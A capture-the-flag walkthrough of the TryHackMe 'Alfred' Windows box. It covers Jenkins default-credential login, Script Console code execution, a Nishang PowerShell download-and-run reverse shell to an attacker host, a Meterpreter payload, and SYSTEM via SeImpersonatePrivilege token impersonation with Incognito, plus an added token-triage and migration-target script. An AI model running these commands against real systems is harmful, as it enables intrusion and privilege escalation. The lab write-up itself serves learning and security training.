Windows Security: Abusing Access Tokens | A Practical CTF Walkthrough
Exploit misconfigured access tokens to impersonate SYSTEM and own the box.
Alfred | Windows
Difficulty: Medium
Tags: Jenkins, RCE, Nishang, Meterpreter, SeImpersonatePrivilege, Incognito
Tools Used: Nmap, curl, Jenkins, Nishang, Metasploit, Incognito
“RIP Bruce Wayne.” But Alfred lived on. 🦇
This TryHackMe Windows box combined low-friction recon with a powerful post-ex chain that revolved around token impersonation. Jenkins got us in. Windows internals took us up. If you're prepping for red team or OSCP-style Windows footholds, this box is a masterclass in leveraging misconfigurations without needing zero-days.
Initial Recon: Port Scanning and Surface Mapping
Started fast:
nmap -F 10.10.176.75
Open ports:
80 – HTTP
8080 – HTTP-proxy
3389 – RDP
Probed port 80 with curl:
curl 10.10.176.75
Returned:
<img src="bruce.jpg"> RIP Bruce Wayne
Donations: alfred@wayneenterprises.com
Suspicious image? Maybe stego. Downloaded bruce.jpg and threw tools at it: steghide, zsteg, exiftool. Nothing stuck. Logged it as a red herring.
Jenkins Discovery on Port 8080
Navigated to http://10.10.176.75:8080 and got a Jenkins login page.
Default creds?
Username: admin
Password: admin
Logged in. UI footer showed Jenkins 2.190.1
No CVE hunting needed: the Script Console runs arbitrary Groovy on the Jenkins controller under the service's own account, so admin access to it is code execution by design.
Jumped to:
Manage Jenkins > Script Console
Tested RCE. The console only speaks Groovy, so the command has to be spawned from it rather than typed bare:
println "whoami".execute().text
Success. Time to weaponize.
Shell Access with Nishang
Spun up a reverse shell:
nc -lnvp 8888
Served Nishang's Invoke-PowerShellTcp.ps1 from the attacker box:
python3 -m http.server 5555
Payload in the Jenkins Script Console, wrapped so Groovy actually spawns it (a bare command line is not valid Groovy):
"powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888".execute()
Shell landed as bruce, the account the Jenkins service runs under.
Grabbed user flag:
type C:\Users\bruce\Desktop\user.txt
Upgrading to Meterpreter for Priv-Esc
Dropped in with a better payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe
Listener ready:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run
Uploaded shell.exe and executed it. Meterpreter session caught.
Understanding Windows Tokens
With Meterpreter live:
getprivs
Found: SeImpersonatePrivilege
This is the privilege that breaks the box. Every process and thread on Windows carries an access token: the user SID, the group SIDs and the privileges that decide what it may touch. SeImpersonatePrivilege ("Impersonate a client after authentication") lets a thread adopt any token it can obtain a handle to, and Windows grants it by default to service accounts, which is why a shell spawned by the Jenkins service has it even though bruce's interactive logon would not. Get hold of a SYSTEM token and you are SYSTEM.
Token Abuse with Incognito
Loaded the Incognito module:
load incognito
list_tokens -g
Found:
Delegation token: BUILTIN\Administrators
A delegation-level token can also authenticate to remote hosts; an impersonation-level token only works on the local machine, which is why Incognito lists the two separately. Either is enough here.
Boom.
impersonate_token "BUILTIN\\Administrators"
getuid
Result:
NT AUTHORITY\SYSTEM
Just like that, we’re at the top.
Migrating for Stability
Enumerated processes:
ps
Picked a SYSTEM-owned PID (services.exe is a safe, long-lived choice) and migrated. Incognito's impersonation lives on the Meterpreter thread only: anything checked against the process's primary token, and any child process it spawns, still runs as bruce, and the session dies with the Jenkins-spawned process. Migrating into a SYSTEM process makes SYSTEM the primary token:
migrate <pid>
getuid
Confirmed:
NT AUTHORITY\SYSTEM
Captured root flag:
type C:\Windows\System32\config\root.txt
Game over.
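Before loading Incognito, these are the checks I would run from the bruce shell on the target, plus the list I would pick a migration target from. This is an added example, not code from the original write-up: it parses whoami /priv for the privileges that by themselves give a route to SYSTEM, shows which account the Jenkins service runs as, and enumerates SYSTEM-owned processes via WMI. The "high-value" shortlist is this example's own, not an official list, and the service name jenkins is an assumption about how the service is registered.

```powershell
# Added example (not from the original write-up): token triage and migration targets
# from a low-privileged shell. Assumptions: service registered as 'jenkins'; the
# high-value list below is this example's shortlist, not an exhaustive one.

# Privileges that on their own give a known route to SYSTEM or to files the ACL forbids.
$HighValue = @{
    'SeImpersonatePrivilege'        = 'impersonate any token you can get a handle to'
    'SeAssignPrimaryTokenPrivilege' = 'start a process under another token'
    'SeDebugPrivilege'              = 'open any process, SYSTEM ones included'
    'SeBackupPrivilege'             = 'read any file regardless of ACL (SAM/SYSTEM hives)'
    'SeRestorePrivilege'            = 'write any file regardless of ACL'
    'SeTakeOwnershipPrivilege'      = 'take ownership of any securable object'
    'SeLoadDriverPrivilege'         = 'load a kernel driver'
    'SeTcbPrivilege'                = 'act as part of the operating system'
}

function Get-TokenTriage {
    # whoami /priv reports the current token's privileges; CSV keeps the parse robust.
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    $id    = [Security.Principal.WindowsIdentity]::GetCurrent()
    $hits  = foreach ($p in $privs) {
        $name = $p.'Privilege Name'
        if ($HighValue.ContainsKey($name)) {
            [pscustomobject]@{
                Privilege = $name
                # "Disabled" is not "absent": the holder can re-enable it with AdjustTokenPrivileges.
                State     = $p.State
                Why       = $HighValue[$name]
            }
        }
    }
    [pscustomobject]@{ User = $id.Name; IsSystem = $id.IsSystem; HighValue = $hits }
}

function Get-ServiceAccount([string]$Name = 'jenkins') {
    # Services get SeImpersonatePrivilege by default even when they run as an ordinary
    # user, which is why a shell spawned by Jenkins has it while a desktop logon would not.
    Get-CimInstance Win32_Service -Filter "Name='$Name'" |
        Select-Object Name, StartName, State, PathName
}

function Get-MigrationCandidates {
    # SYSTEM-owned, long-lived processes. Prefer services.exe or winlogon.exe; lsass.exe is
    # protected on hardened hosts and opening it is exactly what EDR watches for.
    $preferred = 'services.exe', 'winlogon.exe', 'spoolsv.exe', 'svchost.exe'
    Get-CimInstance Win32_Process | ForEach-Object {
        # GetOwner fails (ReturnValue 2) for processes we may not open; those are skipped.
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
        if ($owner.ReturnValue -eq 0 -and $owner.User -eq 'SYSTEM') {
            [pscustomobject]@{
                PID       = $_.ProcessId
                Name      = $_.Name
                Preferred = $preferred -contains $_.Name
            }
        }
    } | Sort-Object -Property @{ Expression = 'Preferred'; Descending = $true }, PID
}

$t = Get-TokenTriage
"Token: {0}  SYSTEM={1}" -f $t.User, $t.IsSystem
$t.HighValue | Format-Table -AutoSize
Get-ServiceAccount | Format-List
Get-MigrationCandidates | Format-Table -AutoSize
```

Match the architecture of the chosen PID to the Meterpreter payload (the ps output shows it) before migrating; a 32-bit session cannot migrate into a 64-bit process.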
Summary / Review
Foothold:
Jenkins default creds ➤ Script Console RCE
Nishang shell ➤ bruce access
Escalation:
Upgraded to Meterpreter
Found SeImpersonatePrivilege
Used Incognito to impersonate BUILTIN\Administrators
Migrated to SYSTEM process
Captured root.txt
Command Recap
nmap -F 10.10.176.75
curl 10.10.176.75
# Jenkins default login at port 8080
nc -lnvp 8888
python3 -m http.server 5555
# Jenkins console:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe
# In Metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run
getprivs
load incognito
list_tokens -g
impersonate_token "BUILTIN\\Administrators"
migrate <pid>
type C:\Windows\System32\config\root.txt
Final Thoughts
Jenkins Script Console, token abuse, and root in under an hour.
This was a real-world Windows escalation chain built on weak defaults and misunderstood privileges.
Another one rooted. On to the next.